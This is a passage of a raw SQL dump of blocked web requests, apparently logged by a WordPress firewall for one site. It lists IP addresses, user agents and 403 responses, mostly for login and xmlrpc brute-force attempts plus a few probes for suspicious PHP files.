Safari\\/537.36\"}','SYgtes9uT30L4Ef5hAbJjwkd',0,1664069216.1103,1601,'','POST',403,0,600,0,1,'',0),('122.17.148.164',2047972516,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','n4CYw3UOqpiVy8NIH2EsDkKJ',0,1664069419.1785,1938,'','POST',403,0,515,0,1,'',0),('62.102.148.152',1046910104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','SdP9VaKGJ5MFRUbi67m48BTY',0,1664069468.1128,1633,'','POST',403,0,515,0,1,'',0),('67.227.251.154',1139014554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Q6wdVJjgbcSL5OoDsuPMytmB',0,1664070075.4696,506,'','POST',403,0,515,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eQl4W2pvKAR78cXZ0FCHGwMk',0,1664070345.9582,1738,'','POST',403,0,515,0,1,'',0),('184.171.244.176',3098277040,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Dx7HVvjWfNY64G8ipdIruX5a',0,1664070724.3974,7312,'','POST',403,0,515,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','YSKwzH30QUmXVPcIDxkqgNvL',0,1664070757.1053,439,'','POST',403,0,600,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DtMHuo1rjnwBySEdX98cm5lb',0,1664071004.3434,1327,'','POST',403,0,515,0,1,'',0),('35.187.58.136',599472776,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','hHydB7tg2l1TGMmkr0snzYaQ',0,1664071491.2893,18658,'','POST',403,0,600,0,1,'',0),('209.145.54.196',3515954884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gEUHnFJu7sBq2XCcx3YV9mpQ',0,1664071643.8131,2390,'','POST',403,0,515,0,1,'',0),('203.118.155.133',3413547909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vp39dQjWJqGt7IkEO0cN8fne',0,1664072027.0831,1348,'','POST',403,0,515,0,1,'',0),('199.188.207.230',3351039974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XcV7YAqjLH85UyRtph9OZo3E',0,1664072302.2432,1317,'','POST',403,0,515,0,1,'',0),('150.109.148.216',2523763928,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','SvdVnFUgpwrfysEubRW4Ni6l',0,1664072315.9374,495,'','POST',403,0,600,0,1,'',0),('134.19.179.203',2249438155,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','34Is2zVByoJGF51Rj7SYpxiM',0,1664072475.3037,1923,'','POST',403,0,515,0,1,'',0),('139.59.85.224',2335921632,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','X4zdEeTS5Gy8NtrKHcjiDR07',0,1664073050.0943,14969,'','POST',403,0,600,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wW9nR4NHMLxFeIUP0dZOYtAX',0,1664073634.0203,2775,'','POST',403,0,515,0,1,'',0),('106.15.38.206',1779377870,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','8iKHZdXRJbfGMqD7jeAUS6o2',0,1664073866.6423,494,'','POST',403,0,600,0,1,'',0),('172.104.81.115',2892517747,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0HmbX1EnChisdFTk3l6cVtqA',0,1664074004.2757,2460,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','smxRPLlpi4DGCfhg0KdbAZ3W',0,1664074273.3663,1319,'','POST',403,0,515,0,1,'',0),('159.203.121.12',2680912140,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','ePjiR2CbQlrBVkKvsd0GatFA',0,1664074599.5936,1415,'','POST',403,0,600,0,1,'',0),('51.75.15.189',860557245,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','IBiF0WQyHNeDxqn65MSuUTVo',0,1664075418.5004,18271,'','POST',403,0,600,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','65Uzi19eyldOnhVPBEuMrcT3',0,1664075593.2189,2306,'','POST',403,0,515,0,1,'',0),('95.173.161.171',1605214635,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6doO41pBZg3UiykhWMIYeb9K',0,1664075965.4766,1634,'','POST',403,0,515,0,1,'',0),('104.41.221.5',1747574021,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','UlezD782yNELhgQPS6FxinRs',0,1664076146.6083,1336,'','POST',403,0,600,0,1,'',0),('194.233.69.10',3270067466,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9ofzMdKURuJ7wmWtP4HV6NeD',0,1664076227.9490,1222,'','POST',403,0,515,0,1,'',0),('202.21.38.119',3390383735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','nYbCZV18ktgufB4SWwDMKP7J',0,1664076962.4881,17921,'','POST',403,0,600,0,1,'',0),('213.152.161.249',3583549945,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2Zl1LcE3f7VzNPJpaR58ikMI',0,1664077648.5876,2278,'','POST',403,0,515,0,1,'',0),('187.32.211.193',3139490753,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','7h9kafinzu6Xdb5KySrvCItL',0,1664077699.3440,1294,'','POST',403,0,600,0,1,'',0),('161.35.126.102',2703457894,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','xOl7NPX9nwHbVIdf5zRsAJiB',0,1664078516.7202,10569,'','POST',403,0,600,0,1,'',0),('94.231.86.20',1592219156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','OxEeijtFzT4GRJLwslHrU703',0,1664079256.9453,3429,'','POST',403,0,600,0,1,'',0),('208.113.153.235',3497105899,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','BEYcOq5a4SJ7AZ3XuF6rPm82',0,1664080076.7068,1699,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','DKAMmT1VF3tWeJqpHBsyizZa',0,1664080812.8240,1459,'','POST',403,0,600,0,1,'',0),('148.72.214.194',2487801538,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','gYtwaqn7mQeF9CJ2A4DfW1EU',0,1664081631.4603,17638,'','POST',403,0,600,0,1,'',0),('151.106.41.64',2540316992,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','jVluTAJEhCiQBGNrUYsz5gyD',0,1664082371.5702,1813,'','POST',403,0,600,0,1,'',0),('118.24.106.172',1981311660,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','QYoTwIPHCScKzMBvalqUNh3J',0,1664083199.5766,1401,'','POST',403,0,600,0,1,'',0),('173.44.55.179',2905356211,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','B8IQyDhrXvbKGPHRlpC91Ffa',0,1664083459.3051,2347,'','POST',403,0,515,0,1,'',0),('192.99.201.91',3227765083,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','rt0BXqlYUx36QucsaLzFA4VC',0,1664083923.3952,17119,'','POST',403,0,600,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/ups.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','rfl9FuxmTabsyG3jCcYEw45N',0,1664084682.6294,5700,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/ups.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','DTkqZU0sp79du1fHNl2nzPBj',0,1664084693.3162,10430,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/ru.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','RD52QjqmcpWN4GHLo3BKMy1g',0,1664084709.7974,340,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/ru.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6wntegZ2YWuxQEalc81R0ODC',0,1664084715.4413,314,'','GET',403,0,700,0,1,'',0),('91.207.57.115',1540307315,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ygTfqXn9lw3Yzv5RjS7hDF4o',0,1664085336.4802,18695,'','POST',403,0,515,0,1,'',0),('159.89.109.117',2673438069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','Mf7yepHwDboRTv3C01NLXscF',0,1664085455.4594,1225,'','POST',403,0,600,0,1,'',0),('46.183.216.163',783800483,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZYJeKUysSIx4XPHV2cuTbphW',0,1664086023.6996,19254,'','POST',403,0,515,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','RCcPyl0U6Kxe2XoLFzA1YTIQ',0,1664086266.9845,17941,'','POST',403,0,600,0,1,'',0),('51.91.220.143',861658255,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','fCXOZTbi5dyHxWLjSp0vUgK2',0,1664086986.3044,17283,'','POST',403,0,600,0,1,'',0),('188.166.61.228',3165011428,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','WKNdBI8qA9sRrxHtfQVwpuLE',0,1664087786.8423,18125,'','POST',403,0,600,0,1,'',0),('34.69.109.132',574975364,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','6peqcBgjfIwNSOtRsdxrC8iu',0,1664088498.0433,17963,'','POST',403,0,600,0,1,'',0),('54.37.156.240',908434672,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','G3AMtSlZfId0hrDOzxmcFkuE',0,1664089292.2931,18622,'','POST',403,0,600,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/Famous/megaframe/megapanel/inc/functions.php','','{\"1\":\"ALittle Client\"}','OheUkxJB6VNEMb9t0nq8C73w',0,1664089394.7862,289,'','GET',403,0,700,0,1,'',0),('82.102.23.131',1382422403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ONSUeyEVq2wmognc6JvMpkH0',0,1664089534.5263,18591,'','POST',403,0,515,0,1,'',0),('198.98.49.240',3328324080,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\\/5.0)\"}','P2xDQfoCkmn5ZLlb6RjqIs8H',0,1664089846.6233,17684,'','POST',403,0,600,0,1,'',0),('104.41.221.5',1747574021,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','rtnRLCJeWgIcuFXP46kUQwAO',0,1664090003.1750,1324,'','POST',403,0,600,0,1,'',0),('128.199.14.4',2160528900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','jJKZet6AsE9I31FrU0xTWSVv',0,1664090786.3923,17501,'','POST',403,0,600,0,1,'',0),('213.152.162.104',3583550056,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MONintG2HcUICTBZ7rqplmwD',0,1664090957.3462,2322,'','POST',403,0,515,0,1,'',0),('51.38.192.91',858177627,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','a7yVvA3Q89FqgGOsrNBkmYRH',0,1664091490.4285,488,'','POST',403,0,600,0,1,'',0),('37.120.132.91',628655195,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','w1Vz34diTBuCOXSpclM2QZI6',0,1664091591.0783,18682,'','POST',403,0,515,0,1,'',0),('141.98.102.243',2372036339,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','jJZuocR8NO54rmSs9zAP2Kn3',0,1664092165.0735,1527,'','POST',403,0,515,0,1,'',0),('159.223.170.181',2682235573,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','3gjZuh1fDz7E85PCG9Bxq64t',0,1664092278.3893,17547,'','POST',403,0,600,0,1,'',0),('103.130.218.178',1736628914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','PbAVxuqcJNW7CsZjhIR0THO1',0,1664093791.6527,18204,'','POST',403,0,600,0,1,'',0),('93.114.185.76',1567799628,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','gJfUDV2rETGzM9pwBdkACeaS',0,1664094509.7024,1344,'','POST',403,0,600,0,1,'',0),('121.42.231.47',2032854831,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','dxeyBJbZCM18Oc3WIikVNEwj',0,1664095308.7033,17865,'','POST',403,0,600,0,1,'',0),('124.106.71.219',2087339995,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','j4AwEJ0cl8p5IfnKqMHXTRts',0,1664096029.4402,7516,'','POST',403,0,600,0,1,'',0),('75.119.157.181',1266130357,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','y3W2RAKtzBwdMb4lXTEP0Yhc',0,1664096826.1336,1380,'','POST',403,0,600,0,1,'',0),('51.195.148.190',868455614,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','rgXWbsZv5tUo6LuPHJ8OFyM4',0,1664097543.9440,1377,'','POST',403,0,600,0,1,'',0),('185.2.5.77',3103917389,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','5eTmP9H0ADznao8FY6jBsWdl',0,1664099064.1478,17683,'','POST',403,0,600,0,1,'',0),('111.230.202.147',1877396115,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','3ORANELv7o9UZSpQWnrxbc8G',0,1664099862.2495,1330,'','POST',403,0,600,0,1,'',0),('62.102.148.160',1046910112,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','16vLHpxRbd5hcNrzD2oMST7w',0,1664105296.6822,2234,'','POST',403,0,515,0,1,'',0),('213.152.162.5',3583549957,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xy80JAZ6jchfM74UOItBkFSX',0,1664105730.1273,1182,'','POST',403,0,515,0,1,'',0),('81.88.52.8',1364734984,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','uZI4is3wRoqar7ymU5QTOl0D',0,1664106048.2917,1204,'','POST',403,0,600,0,1,'',0),('217.138.252.123',3649764475,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','a1QPtMzG7LEio2qfBkJpslXV',0,1664106310.4948,1442,'','POST',403,0,515,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','wqgpzxAUD8lWQaGnj6o52k4y',0,1664106780.7059,1629,'','POST',403,0,600,0,1,'',0),('82.102.23.139',1382422411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hy6dDjIAn1wKBsUX9lEMaiJq',0,1664106888.7044,1463,'','POST',403,0,515,0,1,'',0),('146.70.115.139',2454090635,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','GRkdcZbp6fgCy351tezvAM4K',0,1664107127.2239,1207,'','POST',403,0,515,0,1,'',0),('213.152.161.15',3583549711,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','e0TnJaoZgDPA41b9dWVkfy2p',0,1664110218.0811,1203,'','POST',403,0,515,0,1,'',0),('125.227.127.195',2112061379,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','xkqTaOX7domGnHhRQZCPYvpV',0,1664110696.2743,17600,'','POST',403,0,600,0,1,'',0),('51.159.155.6',866097926,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','xiqzUEAup1TrZCtVK4Q2D8jv',0,1664116105.5333,18845,'','POST',403,0,600,0,1,'',0),('161.35.126.102',2703457894,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','3Hk074mCQAeoEDypU28IGrMY',0,1664116924.5887,15590,'','POST',403,0,600,0,1,'',0),('35.187.58.136',599472776,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','4GiDFM2CEquANmw7loHYz0pI',0,1664117664.9012,14461,'','POST',403,0,600,0,1,'',0),('184.75.221.171',3091979691,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','VBuYXP6STKUOJNG1oIt3HEQp',0,1664117949.1024,3699,'','POST',403,0,515,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DTeuSL7wEYngsiHXVxN0OA5I',0,1664155659.3523,18810,'','POST',403,0,515,0,1,'',0),('2.184.67.138',45630346,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dEwml09pL2afB7Akch51iDje',0,1664156479.0405,19404,'','POST',403,0,515,0,1,'',0),('165.227.195.28',2783167260,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','LmpNGhObaBgVdMRtQrHCZEcs',0,1664157108.9850,1502,'','POST',403,0,515,0,1,'',0),('165.227.195.28',2783167260,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','O3ZimQEcUdTvaPb7GYC9srVq',0,1664157111.0574,482,'','POST',403,0,515,0,1,'',0),('165.227.195.28',2783167260,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 